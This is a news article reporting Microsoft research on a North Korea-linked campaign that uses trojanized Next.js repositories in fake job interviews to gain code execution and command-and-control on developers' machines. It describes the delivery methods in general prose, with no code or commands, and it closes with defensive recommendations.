Malicious Next.js repositories are being used to target developers through fake job interviews, aiming to establish remote code execution and persistent command-and-control access on infected machines. Microsoft researchers linked this activity to a broader cluster of threats, associated with North Korea's Lazarus APT, that use job-themed lures to infiltrate developer workflows. The campaign's objective is to compromise systems containing high-value assets like source code and cloud access. The attack employs methods like abusing Visual Studio Code automation or embedding obfuscated code into development assets to retrieve and execute malicious payloads.
Malicious Next.js Repos Target Developers Via Fake Job Interviews
Linked to North Korean fake job-recruitment campaigns, the poisoned repositories are aimed at establishing persistent access to infected machines.
Attackers are targeting developers with malicious Next.js repositories to perform remote code execution (RCE) and establish a persistent command-and-control (C2) channel on infected machines in a campaign tied to North Korea's fake job-recruitment scams.
Microsoft sounded the alarm on the activity, which delivers malicious repositories disguised as legitimate Next.js projects and technical assessment materials. Researchers from Microsoft Defender Experts and the Microsoft Defender Security Research Team discovered various Trojanized repositories that offered different execution paths for delivery of a backdoor to compromise developer systems.
"The campaign uses multiple entry points that converge on the same outcome: runtime retrieval and local execution of attacker-controlled JavaScript that transitions into staged command-and-control," according to a blog post published Tuesday by the two Microsoft security teams.
Without specifically attributing the campaign to North Korea, the researchers noted that the activity "aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution," a cluster associated with North Korea's Lazarus APT. The blog post also includes links to third-party research earlier this year about North Korean APT activity tied to Microsoft Visual Studio Code. Indeed, North Korean actors for years have been persistently targeting developers by dangling job opportunities that, as part of a fake job interview, ask them to participate in sample development challenges that deliver malicious code to their machines.
"This developer‑targeting campaign shows how a recruiting‑themed 'interview project' can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend," the blog post stated.
The ultimate objective of the campaign is to gain execution on developer systems that often contain high‑value assets such as source code, environment secrets, and access to build or cloud resources, according to Microsoft. The campaign once again demonstrates how developer workflows are a primary attack surface for cyber espionage and other activity that can lead to further compromise of the entire software supply chain, according to the researchers.
Repositories Leading to Backdoor Activity
The researchers discovered the campaign recently when Microsoft Defender flagged suspicious outbound connections from Node.js processes to attacker-controlled infrastructure, eventually tracking the activity to Next.js repositories all exhibiting the same malicious behavior. Next.js is a widely used open source Web development framework maintained by cloud software vendor Vercel.
The malicious repositories initiate one of two execution paths that deliver a lightweight registration stage to establish host identity as well as bootstrap code. These eventually lead to runtime retrieval and in-memory invocation of attacker-controlled JavaScript that turns into a persistent C2 connection for delivering further payloads and exfiltrating data from infected systems.
Some repositories abuse Visual Studio Code workspace automation by including a .vscode/tasks.json configured to execute tasks automatically when a workspace is opened and trusted, triggering a fetch-and-execute loader sequence via Node.js. Others embed obfuscated malicious logic directly into development assets so that when a developer runs standard build commands or starts a development server, the disguised code decodes and fetches additional payloads.
Developer Attacks Rage On
North Korean cyberspies have been targeting developers with fake job opportunities since at least 2021 when security researchers uncovered the Dream Jobs campaign, sending fake job offers that linked to malicious Web files. This campaign eveolved into more sophisticated socially engineered attacks in which developers were lured into participating in fake development projects or recruitment challenges that delivered spyware and other malware.
The latest discovery of weaponized Next.js repositories illustrates threat actors' commitment to target developers not only to establish a spy channel but also to poison the software supply chain as a whole. To defend against this, secrity operations teams and DevSecOps leaders "should treat developer workflows as a privileged attack surface, integrating IDE trust policies, behavioral analytics, and continuous monitoring into broader threat detection and response programs," according to Microsoft.
Organizations can do this by enforcing strict trust policies for IDEs like Visual Studio Code; deploying attack surface reduction rules via Microsoft Defender for Endpoint to constrain risky script execution behaviors; and prioritizing visibility into unexpected Node.js execution patterns and anomalous outbound connections from developer endpoints.
Meridiano
